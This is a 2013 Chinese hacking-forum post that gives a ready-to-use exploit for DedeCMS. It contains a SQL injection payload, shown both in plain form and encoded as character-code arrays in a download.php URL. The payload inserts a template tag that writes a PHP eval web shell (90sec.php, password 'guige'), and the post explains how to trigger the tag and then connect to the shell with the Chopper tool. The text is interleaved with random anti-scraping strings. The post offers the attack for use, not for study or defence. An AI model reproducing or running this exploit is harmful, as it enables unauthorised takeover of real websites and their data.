中国网络渗透测试联盟
标题:
dedecms漏洞getshell EXP最新
[打印本页]
作者:
admin
时间:
2013-6-10 16:49
标题:
dedecms漏洞getshell EXP最新
本帖最后由 土豆 于 2013-6-10 14:41 编辑
; v$ k' H: m& E4 W& m) e
z+ t" g; e, T6 F/ l+ G, \
6 }. |/ A8 q' U0 X
作者:鬼哥
1 Y- x/ V9 V4 r2 w4 f2 R0 b! i% M
& h g% u7 z5 h% k4 P
看贴不回,没JJ
. w8 w7 m4 K4 [: m8 }# k
+ }' N: r. F/ z# z0 C L; F9 g, e" \
漏洞大家都知道是哪个。
5 F0 E) u% n' Z- K: E- ]
2 [$ |/ `; Z1 H0 J# |6 z- S
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
& a. o$ |; O. Q( ?, m+ k/ F
8 U$ q) j# x2 G% ?* J
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
" n/ E5 t+ F; y$ X/ V; q& v' \2 b5 M
1 h6 F4 x9 V( [) \3 K! e
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
% f0 I9 w1 b! g9 G2 m
; D$ T) B @4 e6 X; B* s
getshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。
6 y9 g. X( O, ^, P" C
" M" Q1 R, o* ~" F8 N& y
但是测试了下。。失败
3 M: v6 n0 R: H4 }
/ W& t5 K' j# q- _) R# c. M0 t; r" }
原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
# R6 a1 x' l C' V
5 y/ w( G2 {% _4 x
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
) F$ ?& ]5 Z/ Z6 C
' p! r- a X) D0 ^# P J, R
EXP:
/ K! o" j( v X- n9 }" X
; I- g7 e) y+ ]3 f& v6 q
http://www.xxx.com/plus/download.php?open=1&arrs1
[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
1 Z9 O3 t: {6 L
2 `+ N5 k1 k6 _- w2 [% `
0 K4 \" O" T0 r1 H+ v, `
成功增加。
4 a1 B9 B8 B3 N. ~8 q, U
% k1 V9 ~) n! ] k$ R* @
访问
http://www.xxx.com/plus/mytag_js.php?aid=9013
" {/ w* u k9 N! P! T" j
生成一句话木马.
# h( G( \ [: A( ]" Z, F
菜刀连接
http://www.xxx.com/plus/90sec.php
密码 guige
2 c+ ^8 ]' k9 D5 x
& ]/ I3 W( L2 [" c- W& b7 ` a) r! _
测试OK。
" r3 g$ X. k6 n$ Z1 F
. t% k) L) A0 q7 K% ]* H* q
7 s, E2 X% Z( U: ~7 f: U
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2